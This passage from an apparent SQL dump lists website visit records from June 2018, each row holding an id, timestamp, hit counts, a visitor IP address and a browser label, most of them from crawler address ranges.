411484,1,1,0,0,'54.36.148.93','other'),(256374,1528411772,1,1,0,0,'54.36.149.97','other'),(256375,1528411929,1,1,0,0,'54.36.148.217','other'),(256376,1528411985,1,1,0,0,'54.36.149.65','other'),(256377,1528412163,1,1,0,0,'54.36.149.79','other'),(256378,1528412253,2,2,0,0,'178.154.171.88','other'),(256379,1528412374,1,1,0,0,'54.36.148.160','other'),(256380,1528412390,1,0,1,0,'66.249.66.155',''),(256381,1528412523,1,1,0,0,'162.243.242.68','msie'),(256382,1528412530,1,1,0,0,'162.243.242.68','firefox'),(256383,1528412532,10,10,0,0,'162.243.242.68','opera'),(256384,1528412825,1,1,0,0,'54.36.148.27','other'),(256385,1528413050,1,1,0,0,'54.36.148.11','other'),(256386,1528413205,1,1,0,0,'54.36.148.62','other'),(256387,1528413312,1,1,0,0,'216.244.66.241','other'),(256388,1528413358,1,1,0,0,'54.36.148.185','other'),(256389,1528413646,1,1,0,0,'91.209.11.236','other'),(256390,1528413956,1,1,0,0,'54.36.148.97','other'),(256391,1528414026,1,1,0,0,'54.36.148.55','other'),(256392,1528414301,1,0,1,0,'66.249.66.157',''),(256393,1528414435,1,0,1,0,'66.249.66.155',''),(256394,1528414703,1,1,0,0,'54.36.148.43','other'),(256395,1528414708,1,1,0,0,'54.36.148.11','other'),(256396,1528414966,1,1,0,0,'54.36.148.106','other'),(256397,1528415049,1,1,0,0,'54.36.148.247','other'),(256398,1528415336,1,1,0,0,'141.8.142.74','other'),(256399,1528415367,1,1,0,0,'54.36.149.46','other'),(256400,1528415382,1,1,0,0,'54.36.148.158','other'),(256401,1528415412,1,1,0,0,'54.36.148.45','other'),(256403,1528415620,1,1,0,0,'54.36.148.54','other'),(256404,1528415935,1,1,0,0,'8.29.198.25','other'),(256405,1528416013,1,1,0,0,'54.36.148.218','other'),(256406,1528416161,1,1,0,0,'180.76.15.11','other'),(256407,1528416544,1,1,0,0,'54.36.149.13','other'),(256408,1528416568,1,1,0,0,'54.36.148.244','other'),(256409,1528416609,1,1,0,0,'54.36.148.32','other'),(256410,1528416763,1,1,0,0,'54.36.148.50','other'),(256411,1528416818,2,2,0,0,'54.36.148.89','other'),(256412,1528417074,1,1,0,0,'54.36.149.12','other'),(256413,1528417354,2,1,1,0,'66.249.66.156',''),(256414,1528417377,1,1,0,0,'66.249.66.155','chrome'),(256415,1528417436,1,1,0,0,'54.36.148.203','other'),(256417,1528417879,1,1,0,0,'141.8.142.74','other'),(256418,1528417952,1,1,0,0,'54.36.148.15','other'),(256419,1528418319,1,1,0,0,'54.36.149.70','other'),(256420,1528418569,1,1,0,0,'54.36.148.213','other'),(256421,1528418614,1,1,0,0,'54.36.148.198','other'),(256422,1528418670,1,1,0,0,'216.244.66.241','other'),(256423,1528418706,1,1,0,0,'54.36.148.197','other'),(256424,1528419076,1,1,0,0,'54.36.148.223','other'),(256425,1528419233,1,1,0,0,'54.36.148.161','other'),(256426,1528419887,1,1,0,0,'54.36.148.72','other'),(256427,1528420516,1,1,0,0,'54.36.149.61','other'),(256428,1528420925,1,1,0,0,'54.36.148.10','other'),(256429,1528420955,1,1,0,0,'54.36.149.63','other'),(256430,1528420960,1,1,0,0,'54.36.148.172','other'),(256431,1528421499,1,1,0,0,'54.36.148.122','other'),(256432,1528421544,1,1,0,0,'54.36.148.121','other'),(256433,1528421578,1,1,0,0,'8.29.198.27','other'),(256434,1528421992,1,1,0,0,'54.36.148.78','other'),(256435,1528422036,1,0,1,0,'66.249.66.155',''),(256436,1528422090,1,1,0,0,'54.36.148.145','other'),(256437,1528422205,1,1,0,0,'54.36.148.36','other'),(256438,1528422293,1,1,0,0,'54.36.148.170','other'),(256439,1528422315,1,1,0,0,'54.36.148.195','other'),(256440,1528422420,1,1,0,0,'54.36.148.32','other'),(256441,1528422596,1,1,0,0,'54.36.148.42','other'),(256442,1528422754,1,1,0,0,'54.36.148.93','other'),(256443,1528423408,1,1,0,0,'54.36.149.96','other'),(256444,1528423766,1,0,1,0,'66.249.66.157',''),(256445,1528423842,1,1,0,0,'54.36.148.243','other'),(256446,1528423906,1,1,0,0,'141.8.142.126','other'),(256447,1528424082,1,1,0,0,'46.188.31.214','msie'),(256448,1528424153,1,1,0,0,'193.106.30.99','firefox'),(256449,1528424225,1,1,0,0,'54.36.148.105','other'),(256450,1528424715,1,1,0,0,'54.36.148.164','other'),(256451,1528425295,1,1,0,0,'54.36.149.77','other'),(256452,1528425313,1,1,0,0,'54.36.149.98','other'),(256453,1528425451,1,1,0,0,'54.36.148.148','other'),(256454,1528425515,1,1,0,0,'54.36.149.17','other'),(256455,1528425918,1,1,0,0,'54.36.148.81','other'),(256456,1528426451,1,1,0,0,'54.36.149.64','other'),(256457,1528426745,1,1,0,0,'54.36.149.45','other'),(256458,1528426755,2,2,0,0,'91.124.118.117','chrome'),(256459,1528426761,1,1,0,0,'8.29.198.25','other'),(256460,1528426777,1,1,0,0,'54.36.149.39','other'),(256461,1528427046,1,1,0,0,'54.36.149.89','other'),(256462,1528427059,1,1,0,0,'54.36.148.251','other'),(256463,1528427206,1,1,0,0,'54.36.148.151','other'),(256464,1528427364,1,1,0,0,'54.36.149.33','other'),(256465,1528427401,1,1,0,0,'54.36.148.225','other'),(256466,1528427534,1,1,0,0,'54.36.148.137','other'),(256467,1528427726,1,1,0,0,'54.36.148.81','other'),(256468,1528427802,1,1,0,0,'54.36.148.149','other'),(256469,1528427886,1,1,0,0,'54.36.148.68','other'),(256470,1528427895,1,1,0,0,'54.36.148.133','other'),(256471,1528428092,1,1,0,0,'54.36.149.28','other'),(256472,1528428256,1,1,0,0,'54.36.148.192','other'),(256473,1528428345,1,1,0,0,'54.36.148.217','other'),(256474,1528428367,1,0,1,0,'66.249.66.155',''),(256475,1528428373,1,1,0,0,'54.36.148.179','other'),(256476,1528428398,1,1,0,0,'54.36.149.97','other'),(256477,1528428486,1,1,0,0,'54.36.148.224','other'),(256478,1528429385,1,1,0,0,'216.244.66.241','other'),(256479,1528429386,1,1,0,0,'54.36.148.149','other'),(256480,1528429418,1,1,0,0,'54.36.148.217','other'),(256481,1528429467,1,1,0,0,'54.36.148.187','other'),(256482,1528429469,1,1,0,0,'54.36.148.181','other'),(256483,1528429472,1,1,0,0,'54.36.148.100','other'),(256484,1528429556,1,1,0,0,'54.36.148.79','other'),(256485,1528429658,1,1,0,0,'54.36.149.104','other'),(256486,1528429722,1,1,0,0,'54.36.149.47','other'),(256487,1528429827,1,1,0,0,'54.36.148.202','other'),(256488,1528431219,1,1,0,0,'54.36.148.233','other'),(256489,1528431292,1,1,0,0,'54.36.148.49','other'),(256490,1528431798,1,1,0,0,'54.36.148.104','other'),(256491,1528431851,1,1,0,0,'54.36.148.192','other'),(256492,1528431963,1,1,0,0,'54.36.148.121','other'),(256493,1528432408,1,1,0,0,'8.29.198.26','other'),(256494,1528432667,1,1,0,0,'54.36.148.43','other'),(256495,1528432833,1,1,0,0,'54.36.148.162','other'),(256496,1528432923,1,1,0,0,'54.36.149.57','other'),(256497,1528433295,1,1,0,0,'54.36.148.192','other'),(256498,1528433297,1,1,0,0,'157.55.39.243','other'),(256499,1528433329,1,1,0,0,'54.36.148.212','other'),(256500,1528433425,1,1,0,0,'54.36.149.55','other'),(256501,1528433579,1,1,0,0,'54.36.148.24','other'),(256502,1528433596,1,0,1,0,'66.249.66.157',''),(256503,1528433819,1,1,0,0,'54.36.149.74','other'),(256504,1528433875,1,1,0,0,'141.8.142.74','other'),(256505,1528434263,1,1,0,0,'54.36.148.99','other'),(256506,1528434953,1,1,0,0,'54.36.148.100','other'),(256507,1528435032,1,1,0,0,'54.36.149.42','other'),(256508,1528435162,1,1,0,0,'54.36.148.182','other'),(256509,1528435216,1,1,0,0,'157.55.39.246','other'),(256510,1528435219,2,2,0,0,'54.36.149.46','other'),(256511,1528435242,1,1,0,0,'144.76.166.14','other'),(256512,1528435254,1,1,0,0,'176.15.19.105','chrome'),(256513,1528435401,1,1,0,0,'37.55.243.7','chrome'),(256514,1528435643,1,1,0,0,'54.36.148.209','other'),(256515,1528435644,1,1,0,0,'54.36.148.79','other'),(256516,1528435823,1,1,0,0,'54.36.149.63','other'),(256517,1528436423,1,1,0,0,'54.36.148.173','other'),(256518,1528436719,1,1,0,0,'54.36.148.104','other'),(256519,1528436928,1,1,0,0,'54.36.149.46','other'),(256520,1528437321,1,1,0,0,'54.36.148.228','other'),(256521,1528437359,1,1,0,0,'54.36.149.107','other'),(256522,1528437429,1,1,0,0,'54.36.148.80','other'),(256523,1528437449,1,1,0,0,'54.36.148.245','other'),(256524,1528437497,1,1,0,0,'54.36.149.11','other'),(256525,1528437596,1,1,0,0,'8.29.198.27','other'),(256526,1528437632,4,4,0,0,'91.196.178.133','chrome'),(256527,1528437633,1,1,0,0,'54.36.148.135','other'),(256528,1528437715,1,1,0,0,'54.36.148.69','other'),(256529,1528437981,1,1,0,0,'54.36.149.1','other'),(256530,1528438014,1,1,0,0,'54.36.149.102','other'),(256531,1528438019,1,1,0,0,'54.36.149.38','other'),(256532,1528438175,1,1,0,0,'54.36.148.97','other'),(256533,1528438267,1,1,0,0,'54.36.149.3','other'),(256534,1528438399,1,1,0,0,'54.36.148.166','other'),(256535,1528438748,1,1,0,0,'54.36.148.127','other'),(256536,1528438815,1,1,0,0,'216.244.66.241','other'),(256537,1528438816,1,1,0,0,'54.36.149.104','other'),(256538,1528439552,1,1,0,0,'91.185.201.71','firefox'),(256539,1528439580,1,0,1,0,'66.249.66.156',''),(256540,1528439656,1,1,0,0,'54.36.148.135','other'),(256541,1528439724,1,1,0,0,'54.36.148.124','other'),(256542,1528439809,1,1,0,0,'91.196.177.145','other'),(256543,1528439921,1,0,1,0,'66.249.66.155',''),(256544,1528440019,1,1,0,0,'54.36.149.24','other'),(256545,1528440081,1,1,0,0,'54.36.148.38','other'),(256546,1528440096,2,2,0,0,'216.244.66.241','other'),(256547,1528440193,1,1,0,0,'54.36.149.55','other'),(256548,1528440863,1,1,0,0,'54.36.148.223','other'),(256549,1528441024,1,1,0,0,'54.36.149.84','other'),(256550,1528441092,1,1,0,0,'54.36.148.245','other'),(256551,1528441256,1,1,0,0,'216.244.66.241','other'),(256552,1528441416,1,1,0,0,'92.113.46.35','chrome'),(256553,1528441806,1,1,0,0,'37.55.243.7','chrome'),(256554,1528442022,2,2,0,0,'91.196.178.70','chrome'),(256555,1528442164,2,2,0,0,'54.36.149.52','other'),(256556,1528442782,1,1,0,0,'216.244.66.241','other'),(256557,1528442855,1,1,0,0,'54.36.148.161','other'),(256558,1528443232,1,1,0,0,'8.29.198.26','other'),(256559,1528443268,1,1,0,0,'54.36.148.168','other'),(256560,1528443350,1,1,0,0,'54.36.148.91','other'),(256561,1528443563,1,1,0,0,'54.36.148.73','other'),(256562,1528444022,1,1,0,0,'54.36.148.52','other'),(256563,1528444218,1,1,0,0,'54.36.148.69','other'),(256564,1528444229,1,1,0,0,'216.244.66.241','other'),(256565,1528444335,1,1,0,0,'54.36.148.180','other'),(256566,1528444653,1,1,0,0,'54.36.149.68','other'),(256567,1528444807,1,1,0,0,'54.36.148.78','other'),(256568,1528444862,1,1,0,0,'54.36.149.61','other'),(256569,1528445070,1,1,0,0,'54.36.148.145','other'),(256570,1528445351,1,1,0,0,'31.134.113.189','other'),(256571,1528445482,1,1,0,0,'176.98.70.133','chrome'),(256572,1528445681,2,2,0,0,'66.102.9.40','chrome'),(256573,1528445705,1,1,0,0,'66.102.9.35','chrome'),(256574,1528445779,2,2,0,0,'46.211.109.67','chrome'),(256575,1528445791,1,1,0,0,'193.19.152.77','other'),(256576,1528445814,1,1,0,0,'54.36.149.17','other'),(256577,1528446123,1,0,1,0,'66.249.66.156',''),(256578,1528446126,1,1,0,0,'54.36.149.91','other'),(256579,1528446291,1,1,0,0,'54.36.149.15','other'),(256580,1528446673,1,1,0,0,'54.36.149.16','other'),(256581,1528446736,1,1,0,0,'95.163.255.19','other'),(256582,1528446931,1,1,0,0,'54.36.148.150','other'),(256583,1528447220,1,1,0,0,'95.163.255.8','other'),(256584,1528447335,1,1,0,0,'54.36.149.66','other'),(256585,1528447459,1,1,0,0,'54.36.148.124','other'),(256586,1528447492,1,0,1,0,'66.249.66.155',''),(256587,1528447568,1,1,0,0,'54.36.148.191','other'),(256588,1528447587,1,1,0,0,'92.112.125.243','chrome'),(256589,1528447589,1,1,0,0,'54.36.149.88','other'),(256590,1528447720,1,1,0,0,'54.36.149.40','other'),(256591,1528447725,1,1,0,0,'54.36.149.19','other'),(256592,1528447839,1,1,0,0,'54.36.148.154','other'),(256593,1528447844,2,2,0,0,'216.244.66.241','other'),(256594,1528447914,1,1,0,0,'54.36.148.106','other'),(256595,1528447931,1,1,0,0,'54.36.148.156','other'),(256596,1528448113,1,1,0,0,'37.53.162.175','opera'),(256597,1528448165,1,1,0,0,'54.36.148.115','other'),(256598,1528448169,1,1,0,0,'195.69.221.42','chrome'),(256599,1528448343,1,1,0,0,'54.36.148.83','other'),(256600,1528448426,1,1,0,0,'8.29.198.27','other'),(256601,1528448669,1,1,0,0,'54.36.148.218','other'),(256602,1528448689,1,1,0,0,'193.106.30.99','firefox'),(256603,1528448727,1,1,0,0,'54.36.149.29','other'),(256604,1528448775,1,1,0,0,'54.36.148.105','other'),(256605,1528448824,1,1,0,0,'54.36.148.139','other'),(256606,1528448874,1,1,0,0,'91.196.178.71','firefox'),(256607,1528448877,1,1,0,0,'54.36.148.146','other'),(256608,1528448882,1,1,0,0,'216.244.66.241','other'),(256609,1528448927,1,1,0,0,'94.179.132.30','chrome'),(256610,1528448947,2,2,0,0,'54.36.148.186','other'),(256611,1528449237,1,1,0,0,'54.36.148.64','other'),(256612,1528449239,1,0,1,0,'66.249.66.156',''),(256613,1528449419,1,1,0,0,'54.36.148.203','other'),(256614,1528449875,1,1,0,0,'91.196.178.181','chrome'),(256615,1528449909,1,1,0,0,'54.36.148.150','other'),(256616,1528450231,1,1,0,0,'54.36.148.91','other'),(256617,1528450283,1,1,0,0,'54.36.148.35','other'),(256618,1528450422,1,1,0,0,'54.36.148.112','other'),(256619,1528450589,1,1,0,0,'54.36.148.31','other'),(256620,1528450858,1,1,0,0,'91.124.182.170','firefox'),(256621,1528450859,1,1,0,0,'54.36.148.200','other'),(256622,1528451378,1,1,0,0,'157.55.39.246','other'),(256623,1528451520,1,1,0,0,'54.36.149.63','other'),(256624,1528451685,1,1,0,0,'54.36.148.212','other'),(256625,1528451706,1,1,0,0,'54.36.148.37','other'),(256626,1528451840,1,1,0,0,'54.36.149.1','other'),(256627,1528451883,1,1,0,0,'54.145.230.46','other'),(256628,1528451945,1,1,0,0,'54.36.148.152','other'),(256629,1528451976,1,1,0,0,'216.244.66.241','other'),(256630,1528452072,1,1,0,0,'54.36.148.137','other'),(256631,1528452224,1,1,0,0,'54.36.148.213','other'),(256632,1528452426,1,1,0,0,'54.36.148.112','other'),(256633,1528452557,1,1,0,0,'54.36.149.98','other'),(256634,1528452605,1,1,0,0,'54.36.148.18','other'),(256635,1528452678,1,1,0,0,'54.36.148.251','other'),(256636,1528452740,1,0,1,0,'66.249.66.155',''),(256637,1528452872,1,1,0,0,'54.36.148.38','other'),(256638,1528453065,1,1,0,0,'54.36.149.82','other'),(256639,1528453143,1,1,0,0,'54.36.148.243','other'),(256640,1528453419,1,1,0,0,'108.59.8.80','other'),(256641,1528453455,2,2,0,0,'54.36.148.178','other'),(256642,1528453466,1,1,0,0,'54.36.148.102','other'),(256643,1528453520,1,1,0,0,'54.36.148.20','other'),(256644,1528453793,1,1,0,0,'54.36.149.48','other'),(256645,1528453830,1,1,0,0,'54.36.148.193','other'),(256646,1528453899,1,1,0,0,'54.36.148.82','other'),(256647,1528453984,1,1,0,0,'54.36.148.148','other'),(256648,1528453998,3,3,0,0,'216.244.66.241','other'),(256649,1528454070,1,1,0,0,'8.29.198.25','other'),(256650,1528454163,1,1,0,0,'54.36.148.239','other'),(256651,1528454211,1,1,0,0,'54.36.148.212','other'),(256652,1528454223,1,1,0,0,'54.36.148.85','other'),(256653,1528454224,1,1,0,0,'54.36.148.183','other'),(256654,1528454259,1,1,0,0,'54.36.148.226','other'),(256655,1528454325,1,1,0,0,'54.36.148.16','other'),(256656,1528454359,1,1,0,0,'54.36.148.217','other'),(256657,1528454437,1,1,0,0,'54.36.148.127','other'),(256658,1528454523,1,1,0,0,'144.76.166.14','other'),(256659,1528454525,1,1,0,0,'54.165.59.7','other'),(256660,1528454588,1,1,0,0,'54.145.230.46','other'),(256661,1528454723,1,0,1,0,'66.249.66.156',''),(256662,1528454777,1,1,0,0,'54.36.149.31','other'),(256663,1528454870,1,1,0,0,'146.185.157.164','chrome'),(256664,1528454875,1,1,0,0,'54.36.149.104','other'),(256665,1528455053,1,1,0,0,'54.36.148.178','other'),(256666,1528455147,1,1,0,0,'54.36.149.86','other'),(256667,1528455328,1,1,0,0,'54.36.148.50','other'),(256668,1528455532,1,1,0,0,'216.244.66.241','other'),(256669,1528455592,1,1,0,0,'54.36.148.224','other'),(256670,1528455731,1,1,0,0,'141.8.142.74','other'),(256671,1528455968,1,1,0,0,'54.36.148.193','other'),(256672,1528455973,1,1,0,0,'54.36.149.74','other'),(256673,1528456263,1,1,0,0,'54.36.148.82','other'),(256674,1528456266,1,1,0,0,'54.36.149.90','other'),(256675,1528456352,1,1,0,0,'54.36.148.213','other'),(256676,1528456364,1,1,0,0,'54.36.148.44','other'),(256677,1528456389,1,1,0,0,'54.36.148.131','other'),(256678,1528456864,1,1,0,0,'54.145.183.31','other'),(256679,1528456991,2,2,0,0,'216.244.66.241','other'),(256680,1528457076,1,1,0,0,'54.36.148.101','other'),(256681,1528457260,1,1,0,0,'54.36.148.122','other'),(256682,1528457310,1,1,0,0,'54.36.149.20','other'),(256683,1528457912,1,1,0,0,'54.36.148.180','other'),(256684,1528457938,1,1,0,0,'54.36.148.77','other'),(256685,1528457965,1,1,0,0,'54.36.149.2','other'),(256686,1528458117,1,1,0,0,'141.8.142.74','other'),(256687,1528458417,1,1,0,0,'54.36.148.108','other'),(256688,1528458513,1,1,0,0,'54.36.148.66','other'),(256689,1528458613,1,1,0,0,'46.211.122.232','chrome'),(256690,1528458865,2,2,0,0,'91.196.178.169','chrome'),(256691,1528459079,1,1,0,0,'54.36.148.156','other'),(256692,1528459270,1,1,0,0,'8.29.198.27','other'),(256693,1528459495,1,1,0,0,'54.145.183.31','other'),(256694,1528459497,1,1,0,0,'54.36.148.236','other'),(256695,1528459538,1,1,0,0,'54.36.148.45','other'),(256696,1528459932,2,2,0,0,'92.113.27.158','msie'),(256697,1528459946,1,1,0,0,'54.36.149.48','other'),(256698,1528460014,1,1,0,0,'91.196.178.90','firefox'),(256699,1528460407,1,1,0,0,'54.36.148.25','other'),(256700,1528460437,1,1,0,0,'54.36.148.78','other'),(256701,1528460589,1,1,0,0,'180.76.15.11','other'),(256702,1528460649,1,1,0,0,'54.36.148.249','other'),(256703,1528460947,1,1,0,0,'54.36.149.68','other'),(256704,1528461055,1,1,0,0,'216.244.66.241','other'),(256705,1528461163,1,1,0,0,'54.36.149.103','other'),(256706,1528461402,1,1,0,0,'54.36.148.87','other'),(256707,1528461662,1,1,0,0,'54.36.148.137','other'),(256708,1528461729,1,1,0,0,'91.196.178.98','chrome'),(256709,1528461858,1,1,0,0,'54.36.148.165','other'),(256710,1528461868,1,1,0,0,'54.36.148.162','other'),(256711,1528461918,1,1,0,0,'54.36.149.89','other'),(256712,1528462181,1,1,0,0,'54.36.148.54','other'),(256713,1528462283,1,1,0,0,'54.145.183.31','other'),(256714,1528462381,1,1,0,0,'54.36.149.60','other'),(256715,1528462394,1,1,0,0,'54.36.148.187','other'),(256716,1528462436,1,1,0,0,'54.36.148.130','other'),(256717,1528462463,1,1,0,0,'54.36.149.92','other'),(256718,1528462538,1,1,0,0,'216.244.66.241','other'),(256719,1528462700,1,1,0,0,'54.36.148.96','other'),(256720,1528462725,1,0,1,0,'66.249.66.155',''),(256721,1528462783,1,1,0,0,'54.36.149.17','other'),(256722,1528462943,1,1,0,0,'54.36.148.115','other'),(256723,1528463186,1,1,0,0,'46.211.134.54','chrome'),(256724,1528463241,1,1,0,0,'157.55.39.66','other'),(256725,1528463288,1,1,0,0,'151.80.36.200','other'),(256726,1528463348,1,1,0,0,'54.36.148.140','other'),(256727,1528463623,1,1,0,0,'54.36.149.26','other'),(256728,1528463685,1,1,0,0,'141.8.142.74','other'),(256729,1528463751,1,1,0,0,'54.36.148.125','other'),(256730,1528463862,1,1,0,0,'216.244.66.241','other'),(256731,1528464075,1,1,0,0,'54.36.148.193','other'),(256732,1528464505,1,1,0,0,'54.36.149.43','other'),(256733,1528464645,1,1,0,0,'54.36.148.39','other'),(256734,1528464710,1,1,0,0,'195.10.210.70','chrome'),(256735,1528464895,1,1,0,0,'8.29.198.27','other'),(256736,1528464974,1,1,0,0,'54.36.148.94','other'),(256737,1528465180,1,1,0,0,'54.36.148.233','other'),(256738,1528465258,1,1,0,0,'54.36.149.3','other'),(256739,1528465269,1,1,0,0,'54.36.148.49','other'),(256740,1528465302,1,1,0,0,'54.36.148.168','other'),(256741,1528465449,1,1,0,0,'157.55.39.246','other'),(256742,1528465566,1,1,0,0,'54.36.148.147','other'),(256743,1528465619,1,1,0,0,'54.36.148.184','other'),(256744,1528465627,1,1,0,0,'54.36.148.240','other'),(256745,1528465646,1,1,0,0,'54.36.148.191','other'),(256746,1528465965,1,1,0,0,'54.36.148.41','other'),(256747,1528465997,1,1,0,0,'54.36.148.42','other'),(256748,1528466178,1,1,0,0,'54.36.148.243','other'),(256749,1528466240,1,1,0,0,'54.36.148.179','other'),(256750,1528466306,1,1,0,0,'87.250.224.46','other'),(256751,1528466401,1,1,0,0,'95.163.255.4','other'),(256752,1528466541,1,1,0,0,'54.36.148.22','other'),(256753,1528467146,1,1,0,0,'62.205.134.182','msie'),(256754,1528467224,1,1,0,0,'54.36.148.109','other'),(256755,1528467256,1,1,0,0,'54.36.148.137','other'),(256756,1528467473,1,1,0,0,'54.36.149.75','other'),(256757,1528467523,1,1,0,0,'54.36.148.190','other'),(256758,1528467575,1,1,0,0,'54.36.148.234','other'),(256759,1528467741,1,1,0,0,'54.36.148.134','other'),(256760,1528467877,1,1,0,0,'216.244.66.241','other'),(256761,1528467878,1,1,0,0,'54.36.149.57','other'),(256762,1528467912,1,1,0,0,'54.36.148.40','other'),(256763,1528467927,1,1,0,0,'54.36.148.57','other'),(256764,1528468018,1,1,0,0,'54.36.148.59','other'),(256765,1528468339,2,2,0,0,'54.36.148.22','other'),(256766,1528468371,2,2,0,0,'54.36.148.226','other'),(256767,1528468462,1,1,0,0,'54.36.149.93','other'),(256768,1528468801,1,1,0,0,'54.36.148.213','other'),(256769,1528468905,1,1,0,0,'54.36.149.56','other'),(256770,1528468927,1,1,0,0,'66.249.66.75','chrome'),(256771,1528469055,1,1,0,0,'54.36.148.194','other'),(256772,1528469057,1,1,0,0,'54.36.148.86','other'),(256773,1528469097,1,1,0,0,'54.36.149.98','other'),(256774,1528469129,1,1,0,0,'54.36.149.46','other'),(256775,1528469287,1,1,0,0,'54.36.148.129','other'),(256776,1528469289,1,1,0,0,'54.36.149.47','other'),(256777,1528469347,1,1,0,0,'54.36.149.45','other'),(256778,1528469389,1,1,0,0,'54.36.149.93','other'),(256779,1528469492,1,1,0,0,'54.36.148.42','other'),(256780,1528469907,1,1,0,0,'54.36.148.85','other'),(256781,1528469912,1,1,0,0,'193.106.30.99','firefox'),(256782,1528470069,1,1,0,0,'54.36.148.195','other'),(256783,1528470105,1,1,0,0,'8.29.198.27','other'),(256784,1528470228,1,1,0,0,'54.36.148.202','other'),(256785,1528470542,1,1,0,0,'54.36.149.75','other'),(256786,1528470558,1,1,0,0,'54.36.148.111','other'),(256787,1528470639,1,1,0,0,'95.163.255.15','other'),(256788,1528470679,1,1,0,0,'46.211.127.129','other'),(256789,1528470886,1,1,0,0,'54.36.149.82','other'),(256790,1528471082,1,1,0,0,'54.36.148.132','other'),(256791,1528471127,1,1,0,0,'54.36.149.8','other'),(256792,1528471384,1,1,0,0,'54.36.148.108','other'),(256793,1528471852,1,1,0,0,'54.36.148.228','other'),(256794,1528471854,1,1,0,0,'180.76.15.141','other'),(256795,1528472131,1,1,0,0,'54.36.148.215','other'),(256796,1528472531,1,1,0,0,'54.36.149.69','other'),(256797,1528472624,1,1,0,0,'54.36.148.141','other'),(256798,1528472802,1,1,0,0,'141.8.142.74','other'),(256799,1528472843,1,1,0,0,'54.36.148.95','other'),(256800,1528472912,1,1,0,0,'54.36.148.21','other'),(256801,1528473087,1,1,0,0,'54.36.149.70','other'),(256802,1528473143,1,1,0,0,'54.36.148.239','other'),(256803,1528473571,1,1,0,0,'54.36.148.61','other'),(256804,1528474511,1,1,0,0,'54.36.149.48','other'),(256805,1528475088,1,1,0,0,'54.36.148.55','other'),(256806,1528475136,1,1,0,0,'54.36.148.136','other'),(256807,1528475342,1,1,0,0,'54.36.148.27','other'),(256808,1528475724,1,1,0,0,'8.29.198.25','other'),(256809,1528475936,1,1,0,0,'54.36.148.240','other'),(256810,1528475993,1,1,0,0,'54.36.148.219','other'),(256811,1528476107,1,1,0,0,'141.8.142.74','other'),(256812,1528476384,1,1,0,0,'54.36.148.200','other'),(256813,1528476698,1,1,0,0,'54.36.148.88','other'),(256814,1528476906,1,1,0,0,'54.36.148.148','other'),(256815,1528476967,1,1,0,0,'54.36.148.190','other'),(256816,1528476980,1,1,0,0,'54.36.148.66','other'),(256817,1528477093,1,1,0,0,'54.36.148.119','other'),(256818,1528477145,1,1,0,0,'54.36.148.27','other'),(256819,1528477213,1,1,0,0,'54.36.148.237','other'),(256820,1528477219,1,1,0,0,'54.36.149.54','other'),(256821,1528477454,1,1,0,0,'54.36.148.186','other'),(256822,1528477483,1,1,0,0,'54.36.148.112','other'),(256823,1528477686,1,1,0,0,'54.36.148.127','other'),(256824,1528478015,1,1,0,0,'54.36.149.70','other'),(256825,1528478251,1,1,0,0,'47.106.37.223','other'),(256826,1528478296,1,1,0,0,'54.36.149.84','other'),(256827,1528478315,1,1,0,0,'54.36.148.120','other'),(256828,1528478605,1,1,0,0,'54.36.148.165','other'),(256829,1528478666,1,1,0,0,'54.36.148.72','other'),(256830,1528478906,1,1,0,0,'54.36.148.51','other'),(256831,1528478919,1,0,1,0,'66.249.66.76',''),(256832,1528479187,1,1,0,0,'54.36.148.125','other'),(256833,1528479264,1,1,0,0,'54.36.149.8','other'),(256834,1528479309,1,1,0,0,'54.36.148.61','other'),(256835,1528479626,1,1,0,0,'54.36.149.93','other'),(256836,1528479988,1,1,0,0,'216.244.66.241','other'),(256837,1528480419,1,1,0,0,'54.36.149.96','other'),(256838,1528480803,1,1,0,0,'54.36.149.24','other'),(256839,1528480895,1,1,0,0,'54.36.149.19','other'),(256840,1528480941,1,1,0,0,'8.29.198.25','other'),(256841,1528481015,1,1,0,0,'54.36.149.8','other'),(256842,1528481081,1,1,0,0,'54.36.148.159','other'),(256843,1528481172,1,1,0,0,'54.36.149.71','other'),(256844,1528481855,1,1,0,0,'54.36.148.179','other'),(256845,1528482220,1,1,0,0,'193.106.30.99','firefox'),(256846,1528482412,1,1,0,0,'54.36.148.152','other'),(256847,1528482468,1,1,0,0,'87.250.224.46','other'),(256848,1528482574,1,1,0,0,'54.36.149.4','other'),(256849,1528482783,1,1,0,0,'216.244.66.241','other'),(256850,1528483231,1,1,0,0,'54.36.148.217','other'),(256851,1528483364,1,1,0,0,'54.36.148.226','other'),(256852,1528483452,1,1,0,0,'166.62.126.3','chrome'),(256853,1528483633,1,1,0,0,'87.250.224.46','other'),(256854,1528483634,2,2,0,0,'91.196.178.169','chrome'),(256855,1528483637,1,1,0,0,'178.154.171.88','other'),(256856,1528483668,1,1,0,0,'54.36.149.98','other'),(256857,1528483755,1,1,0,0,'93.79.46.44','chrome'),(256858,1528483971,1,1,0,0,'141.8.142.74','other'),(256859,1528484300,1,1,0,0,'54.36.149.28','other'),(256860,1528484333,1,1,0,0,'54.36.148.71','other'),(256861,1528484466,1,0,1,0,'66.249.66.157',''),(256862,1528484502,11,11,0,0,'23.237.4.26','other'),(256863,1528484505,1,1,0,0,'54.36.148.169','other'),(256864,1528484517,1,1,0,0,'54.36.148.54','other'),(256865,1528484763,1,1,0,0,'54.36.148.159','other'),(256866,1528484816,1,1,0,0,'54.36.148.138','other'),(256867,1528485600,1,1,0,0,'54.36.148.253','other'),(256868,1528485661,1,1,0,0,'54.36.148.115','other'),(256869,1528486151,1,1,0,0,'54.36.148.228','other'),(256870,1528486392,1,1,0,0,'178.154.171.88','other'),(256871,1528486552,1,1,0,0,'8.29.198.25','other'),(256872,1528486588,1,1,0,0,'87.250.224.46','other'),(256873,1528486680,1,1,0,0,'54.36.148.144','other'),(256874,1528487223,1,1,0,0,'141.8.142.74','other'),(256875,1528487330,1,1,0,0,'54.36.149.50','other'),(256876,1528487430,1,1,0,0,'54.36.148.224','other'),(256877,1528487441,1,1,0,0,'54.36.148.83','other'),(256878,1528488110,1,1,0,0,'54.36.148.176','other'),(256879,1528488126,1,1,0,0,'185.15.4.114','chrome'),(256880,1528488130,1,1,0,0,'54.36.149.105','other'),(256881,1528488132,1,1,0,0,'54.36.148.22','other'),(256882,1528488446,1,1,0,0,'141.8.142.74','other'),(256883,1528488644,1,1,0,0,'54.36.148.255','other'),(256884,1528488697,1,0,1,0,'66.249.66.157',''),(256885,1528488707,1,1,0,0,'54.36.148.107','other'),(256886,1528488847,1,1,0,0,'54.36.148.39','other'),(256887,1528489339,1,1,0,0,'54.36.148.89','other'),(256888,1528489378,1,1,0,0,'54.36.149.101','other'),(256889,1528489396,1,1,0,0,'54.36.148.119','other'),(256890,1528489409,1,1